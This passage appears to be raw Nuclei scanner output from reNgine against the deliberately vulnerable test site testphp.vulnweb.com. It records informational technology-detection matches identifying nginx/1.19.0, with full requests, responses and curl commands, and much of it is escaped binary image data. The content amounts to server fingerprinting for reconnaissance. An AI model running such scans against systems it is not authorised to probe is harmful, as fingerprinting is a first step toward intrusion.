\\ufffd\\u000c\\r\\ufffd\\ufffd\\ufffd\\ufffd\\ufffdu'\\ufffd\\ufffd0\\ufffd\\ufffdҜ\\ufffdi!JP\\ufffd,L\\ufffd\\u0001\\u001aL\\ufffd\\ufffd\\u001fJ\\ufffd|\\ufffd,p\\ufffdKRB^t\\u0005\\ufffd\\u0000\\ufffd\\ufffd\\ufffdh;\\ufffdj\\ufffdͲ\\ufffdԧs\\ufffd\\ufffdH\\ufffdV\\ufffd\\ufffdm\\ufffd\\u0001\\ufffd\\ufffd\\ufffd\\ufffd\\ufffdC8\\ufffd,\\ufffd!\\ufffd\\ufffd\\ufffd;\\ufffdbg:\\ufffd\\u0004\\ufffd5\\ufffd\\u0018\\u001a\\ufffd\\ufffd.\\ufffd\\u001e\\ufffd\\ufffd\\ufffd\\ufffd[\\ufffd\\u0002oqE\\ufffd\\u0013n\\ufffd\\ufffdR\\u001a \\ufffd\\u0002x}k\\ufffdz\\u0011\\ufffd3\\ufffd\\ufffd\\nn\\ufffd\\ufffd9n\\u0002V\\ufffd$\\ufffd\\ufffd\\ufffdQ׈\\u0002I܃\\ufffdy\\u0026 \\ufffd\\\\\\ufffdT\\ufffd\\ufffdF\\ufffdL@\\u001e\\u0002\\ufffd\\ufffd\\ufffd^\\u001e\\ufffdk\\ufffdu\\ufffd\\ufffd\\ufffdD\\u0018\\ufffd\\ufffd+\\ufffd^\\ufffd\\ufffd\\u0004\\ufffd\\u0019\\u0013\\ufffdY\\ufffd\\u0015\\ufffd\\ufffd\\u001b[莩\\ufffdħi\\ufffd\\u000f\\ufffd:\\ufffd\\ufffd\\ufffdc\\ufffd\\u003c\\u000b\\ufffd6\\u0014d\\ufffd*$\\ufffd\\ufffd\\ufffd\\ufffdL\\ufffd\\ufffd]\\ufffd\\tm\\ufffd\\ufffd\\ufffd\\ufffd\\u0002\\u000e\\ufffdR\\ufffd\\ufffdb\\ufffd\\ufffd\\ufffd)\\u0026 \\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffdq\\ufffd@\\ufffd\\ufffd]\\ufffd\\ufffd\\ufffdU\\ufffd\\ufffd2r\\ufffd)L\\ufffd\\u0000\\ufffd\\u0000\\ufffd\\ufffd\\ufffd,=\\ufffdш\\u000b\\ufffd”\\ufffd܅(\\t\\ufffd\\ufffd\\u0015\\ufffd\\u0004\\ufffd?:1w\\u0017\\ufffd\\ufffdZP\\ufffd\\ufffd%\\t\\ufffd`(\\ufffd\\ufffd\\ufffdD\\ufffd\\ufffd.\\ufffd \\ufffdq\\ufffd\\ufffd\\u0000!\\ufffd\\ufffdQ\\ufffd\\ufffd\\ufffdY\\ufffdw+\\ufffd\\ufffd\\u0012\\ufffd,)X\\ufffda`6\\ufffd\\u0018\\ufffd\\ufffd*x\\ufffd1\\u0014K\\ufffdZ\\ufffd\\ufffd\\u0007\\ufffdz\\ufffd,\\ufffd\\ufffdHS\\u0004\\ufffd)\\u0006\\u000c\\ufffdG\\u0001 \\ufffd\\ufffd\\ufffd\\u0018\\ufffd\\ufffdıD\\ufffd\\ufffd\\ufffd*ԭZ\\u00007\\ufffd\\ufffd\\u0015\\ufffd\\ufffd\\\\=\\t’\\ufffdR-\\ufffd\\ufffd\\ufffd\\u0010]\\ufffdh\\ufffd\\ufffd]~T\\ufffd\\ufffde(Ő\\u0005\\ufffdp\\ufffd\\ufffd\\ufffd\\u0004\\u0003\\ufffd\\u001a\\ufffd*+2kZ\\ufffd\\u0015Z\\u0000D\\u0014\\u0008\\ufffdYB9V\\ufffdp\\u0002L\\ufffdԤ\\ufffd\\ufffdIWn\\ufffd\\ufffd\\u0016\\ufffd\\ufffdm\\u0026@\\ufffd\\ufffdL\\ufffd37\\u001a\\ufffd\\ufffdRX)YЂ)\\ufffd\\ufffd \\tN\\u001eop\\ufffd/\\ufffdR\\ufffd\\ufffd\\u000eGF\\ufffdDhF\\ufffd6:\\ufffdM2ѻ\\ufffd[\\ufffd\\ufffd\\u0001SZ\\u0012\\ufffdǺ\\ufffdC\\ufffdAkv\\ufffd\\ufffdQ\\r\\ufffd\\u0018:\\ufffdH\\ufffd\\ufffdD*]\\ufffdU\\ufffdH\\n\\ufffdII\\u0013\\u001bH\\u001e\\u0015\\ufffdnQn-`(\\ufffd\\ufffd\\ufffd\\ufffdG\\u0010\\ufffd\\u0013\\ufffdv\\ufffd\\ufffd\\u000e\\ufffd\\ufffd\\ufffd\\ufffd5a\\u0017\\ufffdD\\ufffd\\ufffd\\u0000\\ufffd\\ufffdu\\ufffd\\ufffd\\ufffdx\\ufffd\\u0008y\\ufffd\\ufffd\\ufffd\\u0000\\u0002#\\ufffd\\ufffd\\u001bT\\ufffd\\ufffdJ\\ufffdz\\ufffd\\u0007Q\\ufffd\\ufffdc_\\ufffdY%L(%o\\u0010hu\\ufffd7\\tZb\\u0012\\ufffd\\\"u\\ufffd\\ufffdH\\ufffdTn\\\\\\ufffdܽVT\\u0015+\\ufffd\\n\\ufffd\\u0012\\u000e\\ufffd\\ufffdX\\ufffd踸jє\\ufffd\\u001a\\ufffd~\\ufffd뫺ZD\\ufffd\\ufffd\\ufffdc0\\u0004\\u001f\\ufffdW\\ufffdd.\\ufffd\\ufffdIq3m`\\ufffd\\ufffdc9\\u0019\\u001bo\\ufffd\\ufffdY\\u003eC\\ufffd\\ufffd\\ufffd-\\ufffd%\\ufffd\\ufffd\\ufffdd\\ufffd\\ufffd\\ufffd\\ufffd'X'\\ufffdO\\ufffd\\ufffd[\\ufffd\\ufffdn\\ufffdajNl\\ufffd\\ufffd\\u0001\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffdf\\ufffd:V\\ufffd\\ufffdʄ'a\\ufffdkm$\\ufffd\\u001e\\ufffd\\ufffdS\\u0002\\ufffdy\\ufffd\\u0015\\u0003A\\ufffd_€a\\ufffd.\\ufffd\\u0001\\ufffd!#\\ufffd\\ufffd\\ufffdJ\\ufffdI\\ufffdN\\ufffd\\ufffd\\ufffd\\ufffd\\ufffdg \\ufffdGuk\\ufffdq`\\u0010\\ufffd\\ufffd-\\ufffd/1\\n'y\\ufffd\\ufffd/4\\ufffd25\\u0006x\\ufffd\\u0014\\ufffd\\ufffd\\u0010u\\ufffd\\u001ba\\ufffd`%:\\ufffdG\\u00045\\ufffd3j\\ufffd\\ufffdH8\\ufffd\\ufffd\\u0004\\ufffd\\u0000\\ufffdPU\\ufffd'¶1|=~\\ufffd\\ufffd[Z\\u0003-\\ufffd\\ufffd\\ufffd:\\ufffdy\\ufffd\\ufffd\\ufffd\\u001d\\u0012e-\\u0002\\ufffd$\\ufffd\\ufffd \\rD\\ufffdυ[\\ufffdR\\ufffdc\\r-)!\\u000f9\\ufffdW08\\u0008\\ufffd|\\ufffd\\u0014\\ufffd7VȄX\\u0026(ղ\\ufffds\\u0002\\u0008%*\\ufffd\\u001fޝ\\ufffd\\\\e\\u0018\\ufffd\\ufffdWn\\ufffd\\ufffd\\ufffdO\\u003e:\\ufffd\\ufffd\\ufffd\\u0026\\ufffd\\n\\u001c$fȭ\\ufffd\\ufffd@\\ufffd\\u0002\\ufffd (F\\ufffd)\\ufffd˽Ir\\u0017$\\ufffd٣qg\\n\\ufffd\\ufffd\\u0019\\ufffd\\u001b\\ufffd\\ufffd\\ufffd\\ufffd\\u0000T\\ufffd\\u000c\\u001f\\ufffd\\u001c\\ufffd6\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd(\\ufffd\\ufffd'.i\\ufffd׉\\ufffd\\ufffd\\ufffd\\ufffd\\ufffdʙ\\ufffd;q\\ufffd\\ufffdS\\ufffd\\ufffd\\ufffdFRM\\ufffdJ\\ufffdR\\t\\ufffd\\u001b\\ufffd\\u001fÊ\\ufffd*\\u0000\\ufffd\\ufffd\\ufffd0EJ\\ufffd\\ufffd\\u0000\\ufffd\\ufffd \\u000eU\\ufffd\\u0002\\ufffd\\tY\\ufffd䟥[w\\ufffd\\n\\ufffd\\u0000Ӑ\\ufffdP\\ufffd\\ufffdW\\t5\\ufffd\\ufffd6\\ufffd\\u0001eAGI\\u001a\\u0011\\ufffdUD)eq$\\ufffdw\\ufffd|\\ufffdVR\\u0012\\ufffd\\u0008\\ufffdt\\\"L\\ufffdƄ\\ufffd\\ufffd\\t\\ufffdڛ\\ufffd\\ufffdL\\ufffds\\u001e4\\ufffd|\\ufffd\\ufffd\\u0001\\u0000\\u0001\\ufffd\\u0001\\ufffd\\ufffd\\ufffdJ\\ufffd2\\ufffdG7*\\ufffd\\ufffd\\ufffd\\ufffd\\u0026\\u000e\\ufffd\\nT\\ufffd\\ufffd\\u003c\\u0012\\ufffd\\ufffd\\ufffd\\ufffdvaCj\\ufffd\\ufffd\\ufffd\\ufffd*p\\ufffd\\ufffd\\u001b\\ufffd#\\ufffdTEڒ\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffdM\\u000f=\\ufffdB\\ufffd'bi\\ufffd)?\\u00029\\ufffdy-\\ufffd.V\\ufffd\\ufffd\\ufffd\\u0004\\ufffd́\\ufffd\\ufffd\\ufffd]\\ufffd:\\ufffd\\u0015\\ufffd\\ufffd4\\ufffd\\ufffd\\ufffd\\ufffdrgi֚\\ufffd\\u001f\\ufffd\\ufffdU\\ufffd\\ufffd:xҚ\\u0007\\ufffd\\u0012\\ufffdp\\ufffdУ\\ufffdS\\ufffd\\rj\\ufffdM\\ufffd\\ufffd\\ufffd\\u0006\\ufffdx\\u0011\\ufffdR\\ufffdO\\ufffduQ\\u003c\\ufffdY\\ufffd\\u0014\\ufffd\\ufffdJ\\ufffdO}3\\ufffdQ\\ufffd懲\\u0015\\ufffdҖ\\u0000H\\u0003\\ufffd\\ufffdL٥e!*\\ufffdxD\\ufffda\\t#:\\t\\ufffd\\ufffd\\ufffdJ\\ufffd\\u0010\\ufffd\\ufffd\\u001c\\ufffd\\ufffd\\u0026*\\ufffd)\\\"\\ufffd(ˆ\\u0014aL\\u000b\\u001bR\\ufffd\\ufffd\\u001a\\ufffd\\u0010A(\\u003cx\\ufffd\\ufffdP\\ufffdJ\\ufffdUqrd\\ufffd5#6\\ufffd'\\ufffdZ\\r::\\ufffd\\ufffd\\u0010L\\ufffdsN\\ufffd\\ufffd\\ufffd\\\"\\ufffd\\ufffdw\\ufffd\\ufffd²z\\ufffdm*\\ufffd4\\ufffd\\u00007\\u0026\\u0016gp5=\\ufffd\\ufffdR\\ufffd\\ufffd*A\\ufffdP\\ufffd\\ufffd\\ufffd\\ufffdh\\ufffd\\ufffdي\\ufffdՙ\\ufffd*%i@$\\ufffd`i\\ufffdk!\\ufffd!S\\u001a\\ufffd|\\ufffdҥ\\\\\\ufffd\\u000e\\ufffd\\ufffd$\\u0014\\ufffd\\u0002t\\ufffdj\\u00022\\ufffd@m R\\ufffdW\\ufffd1f̤\\ufffd\\ufffd\\u0000\\ufffd\\ufffd\\ufffd\\u0017\\ufffd\\u0012\\ufffd\\ufffdp\\ufffd\\ufffdJ\\ufffd\\u0008Ե(\\ufffdcz\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffdiR\\ufffdPV\\ufffd\\u000c\\ufffdy%m\\ufffd\\ufffd\\ufffd\\u001fqS%\\u00031\\u001e?*T\\ufffd\\u003eE\\u0011\\u00039\\u0011\\ufffd\\u003e\\ufffdj\\ufffd\\t\\ufffd\\u003e\\ufffdR\\ufffdQ\\u0001\\ufffdN\\ufffd\\u0014\\ufffdz\\ufffd@ޕ*Ҹ2ˑ\\ufffd\\u00026\\u001bTKBH:R\\ufffdQ\\ufffd\\u001c[I))\\u0012\\u0007q\\ufffdLI\\u0001\\u000f\\u00109q\\ufffdJ\\ufffd\\ufffd\\ufffdj\\ufffd\\ufffd4\\ufffd\\ufffd\\ufffdP\\ufffd\\ufffd\\\\P\\u0011=\\ufffd\\ufffdUf\\ufffd\\ufffd\\ufffd\",\"ip\":\"44.228.249.3\",\"timestamp\":\"2024-11-13T02:34:53.651715201Z\",\"curl-command\":\"curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/16.3 Safari/605.1.15' 'http://testphp.vulnweb.com/pictures/8.jpg.tn'\",\"matcher-status\":true}\n{\"template\":\"http/technologies/tech-detect.yaml\",\"template-url\":\"https://cloud.projectdiscovery.io/public/tech-detect\",\"template-id\":\"tech-detect\",\"template-path\":\"/home/rengine/nuclei-templates/http/technologies/tech-detect.yaml\",\"info\":{\"name\":\"Wappalyzer Technology Detection\",\"author\":[\"hakluke\",\"righettod\"],\"tags\":[\"tech\"],\"severity\":\"info\",\"metadata\":{\"max-request\":1}},\"matcher-name\":\"nginx\",\"type\":\"http\",\"host\":\"testphp.vulnweb.com\",\"port\":\"80\",\"scheme\":\"http\",\"url\":\"http://testphp.vulnweb.com/Mod_Rewrite_Shop/Details/color-printer/3\",\"path\":\"/Mod_Rewrite_Shop/Details/color-printer/3\",\"matched-at\":\"http://testphp.vulnweb.com/Mod_Rewrite_Shop/Details/color-printer/3\",\"request\":\"GET /Mod_Rewrite_Shop/Details/color-printer/3 HTTP/1.1\\r\\nHost: testphp.vulnweb.com\\r\\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36\\r\\nConnection: close\\r\\nAccept: */*\\r\\nAccept-Language: en\\r\\nAccept-Encoding: gzip\\r\\n\\r\\n\",\"response\":\"HTTP/1.1 404 Not Found\\r\\nConnection: close\\r\\nTransfer-Encoding: chunked\\r\\nContent-Type: text/html\\r\\nDate: Wed, 13 Nov 2024 02:34:53 GMT\\r\\nServer: nginx/1.19.0\\r\\n\\r\\n\\u003chtml\\u003e\\r\\n\\u003chead\\u003e\\u003ctitle\\u003e404 Not Found\\u003c/title\\u003e\\u003c/head\\u003e\\r\\n\\u003cbody\\u003e\\r\\n\\u003ccenter\\u003e\\u003ch1\\u003e404 Not Found\\u003c/h1\\u003e\\u003c/center\\u003e\\r\\n\\u003chr\\u003e\\u003ccenter\\u003enginx/1.19.0\\u003c/center\\u003e\\r\\n\\u003c/body\\u003e\\r\\n\\u003c/html\\u003e\\r\\n\\u003c!-- a padding to disable MSIE and Chrome friendly error page --\\u003e\\r\\n\\u003c!-- a padding to disable MSIE and Chrome friendly error page --\\u003e\\r\\n\\u003c!-- a padding to disable MSIE and Chrome friendly error page --\\u003e\\r\\n\\u003c!-- a padding to disable MSIE and Chrome friendly error page --\\u003e\\r\\n\\u003c!-- a padding to disable MSIE and Chrome friendly error page --\\u003e\\r\\n\\u003c!-- a padding to disable MSIE and Chrome friendly error page --\\u003e\\r\\n\",\"ip\":\"44.228.249.3\",\"timestamp\":\"2024-11-13T02:34:53.657663015Z\",\"curl-command\":\"curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36' 'http://testphp.vulnweb.com/Mod_Rewrite_Shop/Details/color-printer/3'\",\"matcher-status\":true}\n{\"template\":\"http/technologies/tech-detect.yaml\",\"template-url\":\"https://cloud.projectdiscovery.io/public/tech-detect\",\"template-id\":\"tech-detect\",\"template-path\":\"/home/rengine/nuclei-templates/http/technologies/tech-detect.yaml\",\"info\":{\"name\":\"Wappalyzer Technology Detection\",\"author\":[\"hakluke\",\"righettod\"],\"tags\":[\"tech\"],\"severity\":\"info\",\"metadata\":{\"max-request\":1}},\"matcher-name\":\"nginx\",\"type\":\"http\",\"host\":\"testphp.vulnweb.com\",\"port\":\"80\",\"scheme\":\"http\",\"url\":\"http://testphp.vulnweb.com/Mod_Rewrite_Shop/Details/network-attached-storage-dlink/1\",\"path\":\"/Mod_Rewrite_Shop/Details/network-attached-storage-dlink/1\",\"matched-at\":\"http://testphp.vulnweb.com/Mod_Rewrite_Shop/Details/network-attached-storage-dlink/1\",\"request\":\"GET /Mod_Rewrite_Shop/Details/network-attached-storage-dlink/1 HTTP/1.1\\r\\nHost: testphp.vulnweb.com\\r\\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.17 Safari/537.36\\r\\nConnection: close\\r\\nAccept: */*\\r\\nAccept-Language: en\\r\\nAccept-Encoding: gzip\\r\\n\\r\\n\",\"response\":\"HTTP/1.1 404 Not Found\\r\\nConnection: close\\r\\nTransfer-Encoding: chunked\\r\\nContent-Type: text/html\\r\\nDate: Wed, 13 Nov 2024 02:34:53 GMT\\r\\nServer: nginx/1.19.0\\r\\n\\r\\n\\u003chtml\\u003e\\r\\n\\u003chead\\u003e\\u003ctitle\\u003e404 Not Found\\u003c/title\\u003e\\u003c/head\\u003e\\r\\n\\u003cbody\\u003e\\r\\n\\u003ccenter\\u003e\\u003ch1\\u003e404 Not Found\\u003c/h1\\u003e\\u003c/center\\u003e\\r\\n\\u003chr\\u003e\\u003ccenter\\u003enginx/1.19.0\\u003c/center\\u003e\\r\\n\\u003c/body\\u003e\\r\\n\\u003c/html\\u003e\\r\\n\\u003c!-- a padding to disable MSIE and Chrome friendly error page --\\u003e\\r\\n\\u003c!-- a padding to disable MSIE and Chrome friendly error page --\\u003e\\r\\n\\u003c!-- a padding to disable MSIE and Chrome friendly error page --\\u003e\\r\\n\\u003c!-- a padding to disable MSIE and Chrome friendly error page --\\u003e\\r\\n\\u003c!-- a padding to disable MSIE and Chrome friendly error page --\\u003e\\r\\n\\u003c!-- a padding to disable MSIE and Chrome friendly error page --\\u003e\\r\\n\",\"ip\":\"44.228.249.3\",\"timestamp\":\"2024-11-13T02:34:53.671783824Z\",\"curl-command\":\"curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.17 Safari/537.36' 'http://testphp.vulnweb.com/Mod_Rewrite_Shop/Details/network-attached-storage-dlink/1'\",\"matcher-status\":true}\n{\"template\":\"http/technologies/tech-detect.yaml\",\"template-url\":\"https://cloud.projectdiscovery.io/public/tech-detect\",\"template-id\":\"tech-detect\",\"template-path\":\"/home/rengine/nuclei-templates/http/technologies/tech-detect.yaml\",\"info\":{\"name\":\"Wappalyzer Technology Detection\",\"author\":[\"hakluke\",\"righettod\"],\"tags\":[\"tech\"],\"severity\":\"info\",\"metadata\":{\"max-request\":1}},\"matcher-name\":\"nginx\",\"type\":\"http\",\"host\":\"testphp.vulnweb.com\",\"port\":\"80\",\"scheme\":\"http\",\"url\":\"http://testphp.vulnweb.com/Mod_Rewrite_Shop/Details/web-camera-a4tech/2\",\"path\":\"/Mod_Rewrite_Shop/Details/web-camera-a4tech/2\",\"matched-at\":\"http://testphp.vulnweb.com/Mod_Rewrite_Shop/Details/web-camera-a4tech/2\",\"request\":\"GET /Mod_Rewrite_Shop/Details/web-camera-a4tech/2 HTTP/1.1\\r\\nHost: testphp.vulnweb.com\\r\\nUser-Agent: Mozilla/5.0 Windows NT 10.0 Win64 x64 AppleWebKit/537.36 KHTML like Gecko Chrome/122.0.0.0 Safari/537.36 Edg/122.0.0.0\\r\\nConnection: close\\r\\nAccept: */*\\r\\nAccept-Language: en\\r\\nAccept-Encoding: gzip\\r\\n\\r\\n\",\"response\":\"HTTP/1.1 404 Not Found\\r\\nConnection: close\\r\\nTransfer-Encoding: chunked\\r\\nContent-Type: text/html\\r\\nDate: Wed, 13 Nov 2024 02:34:53 GMT\\r\\nServer: nginx/1.19.0\\r\\n\\r\\n\\u003chtml\\u003e\\r\\n\\u003chead\\u003e\\u003ctitle\\u003e404 Not Found\\u003c/title\\u003e\\u003c/head\\u003e\\r\\n\\u003cbody\\u003e\\r\\n\\u003ccenter\\u003e\\u003ch1\\u003e404 Not Found\\u003c/h1\\u003e\\u003c/center\\u003e\\r\\n\\u003chr\\u003e\\u003ccenter\\u003enginx/1.19.0\\u003c/center\\u003e\\r\\n\\u003c/body\\u003e\\r\\n\\u003c/html\\u003e\\r\\n\\u003c!-- a padding to disable MSIE and Chrome friendly error page --\\u003e\\r\\n\\u003c!-- a padding to disable MSIE and Chrome friendly error page --\\u003e\\r\\n\\u003c!-- a padding to disable MSIE and Chrome friendly error page --\\u003e\\r\\n\\u003c!-- a padding to disable MSIE and Chrome friendly error page --\\u003e\\r\\n\\u003c!-- a padding to disable MSIE and Chrome friendly error page --\\u003e\\r\\n\\u003c!-- a padding to disable MSIE and Chrome friendly error page --\\u003e\\r\\n\",\"ip\":\"44.228.249.3\",\"timestamp\":\"2024-11-13T02:34:53.683464436Z\",\"curl-command\":\"curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 Windows NT 10.0 Win64 x64 AppleWebKit/537.36 KHTML like Gecko Chrome/122.0.0.0 Safari/537.36 Edg/122.0.0.0' 'http://testphp.vulnweb.com/Mod_Rewrite_Shop/Details/web-camera-a4tech/2'\",\"matcher-status\":true}\n{\"template\":\"http/technologies/nginx/nginx-version.yaml\",\"template-url\":\"https://cloud.projectdiscovery.io/public/nginx-version\",\"template-id\":\"nginx-version\",\"template-path\":\"/home/rengine/nuclei-templates/http/technologies/nginx/nginx-version.yaml\",\"info\":{\"name\":\"Nginx version detect\",\"author\":[\"philippedelteil\",\"daffainfo\"],\"tags\":[\"tech\",\"nginx\"],\"description\":\"Some nginx servers have the version on the response header. Useful when you need to find specific CVEs on your targets.\",\"severity\":\"info\",\"metadata\":{\"max-request\":1}},\"type\":\"http\",\"host\":\"testphp.vulnweb.com\",\"port\":\"80\",\"scheme\":\"http\",\"url\":\"http://testphp.vulnweb.com/pictures/7.jpg.tn\",\"path\":\"/pictures/7.jpg.tn\",\"matched-at\":\"http://testphp.vulnweb.com/pictures/7.jpg.tn\",\"extracted-results\":[\"nginx/1.19.0\"],\"request\":\"GET /pictures/7.jpg.tn HTTP/1.1\\r\\nHost: testphp.vulnweb.com\\r\\nUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.122 Safari/537.36\\r\\nConnection: close\\r\\nAccept: */*\\r\\nAccept-Language: en\\r\\nAccept-Encoding: gzip\\r\\n\\r\\n\",\"response\":\"HTTP/1.1 200 OK\\r\\nConnection: close\\r\\nContent-Length: 6458\\r\\nAccept-Ranges: bytes\\r\\nContent-Type: application/octet-stream\\r\\nDate: Wed, 13 Nov 2024 02:34:53 GMT\\r\\nEtag: \\\"4dca64a1-193a\\\"\\r\\nLast-Modified: Wed, 11 May 2011 10:27:45 GMT\\r\\nServer: nginx/1.19.0\\r\\n\\r\\n\\ufffd\\ufffd\\ufffd\\ufffd\\u0000\\u0010JFIF\\u0000\\u0001\\u0001\\u0000\\u0000\\u0001\\u0000\\u0001\\u0000\\u0000\\ufffd\\ufffd\\u0000C\\u0000\\u0006\\u0004\\u0005\\u0006\\u0005\\u0004\\u0006\\u0006\\u0005\\u0006\\u0007\\u0007\\u0006\\u0008\\n\\u0010\\n\\n\\t\\t\\n\\u0014\\u000e\\u000f\\u000c\\u0010\\u0017\\u0014\\u0018\\u0018\\u0017\\u0014\\u0016\\u0016\\u001a\\u001d%\\u001f\\u001a\\u001b#\\u001c\\u0016\\u0016 , #\\u0026')*)\\u0019\\u001f-0-(0%()(\\ufffd\\ufffd\\u0000C\\u0001\\u0007\\u0007\\u0007\\n\\u0008\\n\\u0013\\n\\n\\u0013(\\u001a\\u0016\\u001a((((((((((((((((((((((((((((((((((((((((((((((((((\\ufffd\\ufffd\\u0000\\u0011\\u0008\\u0000d\\u0000\\ufffd\\u0003\\u0001\\\"\\u0000\\u0002\\u0011\\u0001\\u0003\\u0011\\u0001\\ufffd\\ufffd\\u0000\\u001c\\u0000\\u0000\\u0001\\u0005\\u0001\\u0001\\u0001\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0006\\u0000\\u0002\\u0004\\u0005\\u0007\\u0003\\u0001\\u0008\\ufffd\\ufffd\\u00006\\u0010\\u0000\\u0002\\u0001\\u0003\\u0003\\u0003\\u0002\\u0004\\u0005\\u0002\\u0007\\u0000\\u0003\\u0000\\u0000\\u0000\\u0001\\u0002\\u0003\\u0004\\u0005\\u0011\\u0000\\u0012!\\u0006\\u00131\\\"A\\u00072Qa\\u0014\\u0015#q\\ufffdB\\ufffd3CR\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\u0000\\u001b\\u0001\\u0000\\u0003\\u0000\\u0003\\u0001\\u0001\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0004\\u0005\\u0006\\u0001\\u0003\\u0007\\u0000\\u0002\\ufffd\\ufffd\\u00000\\u0011\\u0000\\u0001\\u0003\\u0003\\u0002\\u0004\\u0003\\u0008\\u0003\\u0001\\u0001\\u0000\\u0000\\u0000\\u0000\\u0000\\u0001\\u0000\\u0002\\u0003\\u0004\\u0005\\u0011!1\\u0012\\u0013AQaq\\ufffd\\u0006\\u0014\\\"2\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\u0015B\\ufffd\\ufffd\\u0000\\u000c\\u0003\\u0001\\u0000\\u0002\\u0011\\u0003\\u0011\\u0000?\\u0000\\ufffd\\ufffdI\\ufffdKMc\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd^\\ufffdܡ\\ufffdy!\\ufffd2\\ufffd\\ufffdw\\u0005c\\ufffdϓϑ\\ufffd\\u0019\\ufffd|x\\ufffd\\u001bT]K=$4n\\ufffd2\\ufffd\\u0014ʌb\\ufffd\\ufffd\\u000c\\ufffd\\u0018,1φ\\ufffdG\\ufffdQz~\\ufffd\\ufffd=t\\ufffdW\\ufffd\\u0002\\u001aF*\\ufffdO0uw\\ufffdG\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd|\\ufffd\\ufffdq\\ufffd7\\u003c6nI\\ufffd\\ufffd\\u003c\\ufffd\\ufffd\\u0012)]%?\\ufffd\\ufffd@\\ufffd\\u000ez\\ufffdq\\ufffd\\ufffd\\ufffd\\u0014\\u0003\\ufffds\\ufffdj~\\ufffd\\ufffdE \\ufffd\\ufffd\\ufffd\\ufffdμ\\ufffd\\ufffd\\u0017\\ufffdRׄ\\ufffdH\\ufffd7Y_$\\ufffd5\\ufffd\\ufffdT\\ufffd\\ufffd\\u0018Bʤ\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd}\\u001d\\ufffd\\u0026\\ufffd#R\\ufffd\\ufffd\\ufffdO\\ufffdd\\u003e\\ufffd\\ufffd y\\ufffd\\u001c\\ufffd\\ufffd\\u0007VR\\u001c\\ufffd\\u0001u\\ufffdv\\ufffd4*Q\\ufffd\\u0018\\ufffd\\ufffd \\ufffd\\ufffd\\ufffdަ\\u0003\\n\\u0014\\ufffd;\\ufffd\\ufffd\\ufffd\\u000c\\ufffdppt5\\\\\\ufffd\\ufffda\\ufffdl\\u0006\\ufffd\\ufffd:\\ufffdL\\ufffd\\ufffd\\u00059\\u0007$\\ufffd5ǧ\\ufffd3\\ufffd\\ufffd\\ufffd\\ufffdi\\ufffd\\ufffdvb`\\ufffdJ\\ufffdd\\ufffd\\u000f\\ufffd\\ufffdjNﶃ:B\\ufffdu\\ufffd)\\ufffd2\\u001fS;\\ufffd\\u0014\\ufffd\\\"\\ufffdİ\\ufffd\\u0007r\\ufffd\\u0004\\u0000K1\\u0003h\\ufffd\\u0003:.W\\ufffd\\ufffdY\\ufffd\\ufffd\\ufffd;\\ufffdw\\nCI9\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\tϝ3w\\ufffdH\\ufffd\\ufffdD\\ufffdp\\ufffdf\\ufffdy\\ufffd\\u000b\\rp\\ufffd\\ufffd\\ufffd\\u00171\\ufffd~\\u000e7x϶uWCw\\ufffdD\\ufffd\\u000b\\ufffd\\u0012E@\\ufffd\\u000e\\ufffd\\u0018\\u0012FAR}\\ufffd\\ufffd\\ufffd\\u000f\\u0007\\u0004\\u00105:V\\ufffd\\ufffd\\ufffdr\\ufffd\\ufffd\\ufffd\\ufffd0\\ufffdѐ7W\\u000c\\ufffd\\ufffd\\u0017n04\\ufffd o}r\\ufffdN\\u003e\\ufffd\\ufffd+\\rb\\ufffd':\\ufffd6Ll\\u0011\\ufffd\\ufffd8lx\\ufffdBt\\ufffd\\ufffd\\ufffdc+[\\ufffd\\ufffd\\ufffd\\ufffd\\u000fIt\\ufffdj\\ufffdY!\\ufffd\\ufffd!\\ufffd^\\ufffdqʑ\\ufffd,{\\ufffd疉q\\ufffd_\\ufffd\\ufffd\\ufffd\\ufffd\\ufffdd\\u0014\\ufffd\\ufffdG$P\\ufffd\\ufffd\\n\\u000eԳ\\ufffd\\ufffd\\r\\ufffdR\\ufffd\\ufffd\\ufffd\\ufffd\\u003cg\\u001cx\\ufffd]\\ufffdH\\ufffd\\u001dT\\ufffdJ\\ufffdVشQ\\ufffd\\ufffdl\\ufffddd\\ufffd\\u0003$g*\\u0008\\u0004\\ufffd\\u0000\\ufffd:\\ufffdr\\ufffd\\u001bg\\ufffdM$\\ufffd\\u0004h\\ufffd\\ufffd\\ufffd\\ufffdV\\ufffdKm\\u0018\\u0000珮F\\ufffdE\\u001bc\\ufffd\\ufffd\\ufffd\\ufffd\\u0018\\ufffd󟲧\\ufffdϚ\\ufffd\